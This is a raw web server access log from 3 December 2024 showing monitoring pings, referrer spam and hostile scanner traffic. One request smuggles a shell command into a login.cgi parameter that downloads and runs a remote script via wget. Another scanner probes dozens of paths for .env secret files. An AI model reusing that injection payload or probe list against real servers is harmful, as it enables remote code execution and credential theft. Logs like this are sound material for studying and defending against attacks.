77.105.166.134 - - [03/Dec/2024:08:06:38 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [03/Dec/2024:08:06:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:07:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:08:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Dec/2024:08:09:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:08:09:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:10:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.33.9.125 - - [03/Dec/2024:08:11:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [03/Dec/2024:08:11:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.228.198.247 - - [03/Dec/2024:08:12:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
198.235.24.27 - - [03/Dec/2024:08:12:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
77.105.166.134 - - [03/Dec/2024:08:12:31 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:31 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:33 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:08:12:34 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:08:12:36 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:36 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:57 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:57 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Dec/2024:08:12:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [03/Dec/2024:08:12:59 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:12:59 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:13:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:13:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
95.214.55.79 - - [03/Dec/2024:08:13:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:08:13:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [03/Dec/2024:08:14:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [03/Dec/2024:08:14:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [03/Dec/2024:08:14:27 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [03/Dec/2024:08:14:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [03/Dec/2024:08:14:28 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:08:14:28 +0100] "GET /.env.aws HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:08:14:28 +0100] "GET /.env.live HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
212.91.246.72 - - [03/Dec/2024:08:14:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:15:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [03/Dec/2024:08:16:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:08:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:17:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [03/Dec/2024:08:18:44 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:18:44 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:18:46 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:18:46 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:18:48 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:18:48 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Dec/2024:08:18:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [03/Dec/2024:08:19:08 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:19:08 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:19:10 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:19:10 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:19:12 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:19:12 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
49.51.38.193 - - [03/Dec/2024:08:19:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
76.11.185.195 - - [03/Dec/2024:08:19:26 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [03/Dec/2024:08:19:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:20:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:21:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:22:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:23:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [03/Dec/2024:08:25:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:03 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:03 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:05 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:05 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:27 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:27 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:29 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:29 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:31 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:25:31 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
194.50.16.198 - - [03/Dec/2024:08:25:36 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [03/Dec/2024:08:26:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.196 - - [03/Dec/2024:08:26:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.156.55 - - [03/Dec/2024:08:26:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Dec/2024:08:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:28:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.224 - - [03/Dec/2024:08:28:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.04 Chromium/15.0.871.0 Chrome/15.0.871.0 Safari/535.2"
78.153.140.224 - - [03/Dec/2024:08:28:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.224 - - [03/Dec/2024:08:28:14 +0100] "GET /cms/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
78.153.140.224 - - [03/Dec/2024:08:28:15 +0100] "GET /console/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; Karbonn A1+ Duple Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.224 - - [03/Dec/2024:08:28:15 +0100] "GET /pos/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /stg/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Coolpad 3632A Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /~admin/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:43.0) Gecko/20100101 Firefox/43.0"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /~dev/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36 OPR/41.0.2353.56 (Edition Campaign 34)"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /.git/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /.twilio.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.224 - - [03/Dec/2024:08:28:16 +0100] "GET /ADMIN/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_0; nl-nl) AppleWebKit/537.75.14 (KHTML, like Gecko) Fluid/1.7.1 Safari/537.75.14"
78.153.140.224 - - [03/Dec/2024:08:28:17 +0100] "GET /ADMINISTRATOR/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)"
78.153.140.224 - - [03/Dec/2024:08:28:17 +0100] "GET /Admin/.env HTTP/1.1" 404 315 "-" "Opera/9.27 (X11; Linux i686; U; en)"
78.153.140.224 - - [03/Dec/2024:08:28:17 +0100] "GET /Administrator/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16"
78.153.140.224 - - [03/Dec/2024:08:28:17 +0100] "GET /Archipel/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; Touch; MAGWJS)"
78.153.140.224 - - [03/Dec/2024:08:28:17 +0100] "GET /BACKUP/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ; rv:1.8.0.10) Gecko/20070216 Firefox/1.9.0.1"
78.153.140.224 - - [03/Dec/2024:08:28:18 +0100] "GET /BU/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.55"
78.153.140.224 - - [03/Dec/2024:08:28:18 +0100] "GET /CORE/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 5.0.1; LGL22C/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:18 +0100] "GET /Chai/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13"
78.153.140.224 - - [03/Dec/2024:08:28:19 +0100] "GET /Core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.43 (KHTML, like Gecko) Version/10.1.2 Safari/602.1.43"
78.153.140.224 - - [03/Dec/2024:08:28:19 +0100] "GET /LARAVEL/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
78.153.140.224 - - [03/Dec/2024:08:28:19 +0100] "GET /Laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
78.153.140.224 - - [03/Dec/2024:08:28:20 +0100] "GET /Library/.env HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 5.02 [en]"
78.153.140.224 - - [03/Dec/2024:08:28:20 +0100] "GET /Local/.env HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [en]"
78.153.140.224 - - [03/Dec/2024:08:28:20 +0100] "GET /PORTAL/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; EIE10;ENUSMCM; rv:11.0) like Gecko"
78.153.140.224 - - [03/Dec/2024:08:28:21 +0100] "GET /Passportjs/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:21 +0100] "GET /Platform/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.4 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.4"
78.153.140.224 - - [03/Dec/2024:08:28:21 +0100] "GET /Prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALNJS; rv:11.0) like Gecko"
78.153.140.224 - - [03/Dec/2024:08:28:21 +0100] "GET /Production/.env HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
78.153.140.224 - - [03/Dec/2024:08:28:22 +0100] "GET /Public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPod; U; CPU iPhone OS 421 like Mac OS X; en-CA) AppleWebKit/533.17.9 (KHTML like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5"
78.153.140.224 - - [03/Dec/2024:08:28:22 +0100] "GET /Site/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070803 Firefox/2.0.0.6 (Swiftfox)"
78.153.140.224 - - [03/Dec/2024:08:28:22 +0100] "GET /Socketio/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0"
78.153.140.224 - - [03/Dec/2024:08:28:23 +0100] "GET /Stag/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2"
78.153.140.224 - - [03/Dec/2024:08:28:23 +0100] "GET /Staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:23 +0100] "GET /User_info/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0"
78.153.140.224 - - [03/Dec/2024:08:28:23 +0100] "GET /V1/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J3 Safari/6533.18.5"
78.153.140.224 - - [03/Dec/2024:08:28:24 +0100] "GET /V2/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
78.153.140.224 - - [03/Dec/2024:08:28:24 +0100] "GET /Web/.env HTTP/1.1" 404 313 "-" "Opera/9.23 (Windows NT 5.1; U; it)"
78.153.140.224 - - [03/Dec/2024:08:28:24 +0100] "GET /_.env HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18"
78.153.140.224 - - [03/Dec/2024:08:28:25 +0100] "GET /acme/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.224 - - [03/Dec/2024:08:28:25 +0100] "GET /acp/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
212.91.246.72 - - [03/Dec/2024:08:29:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [03/Dec/2024:08:29:47 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [03/Dec/2024:08:30:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [03/Dec/2024:08:31:10 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:10 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:12 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
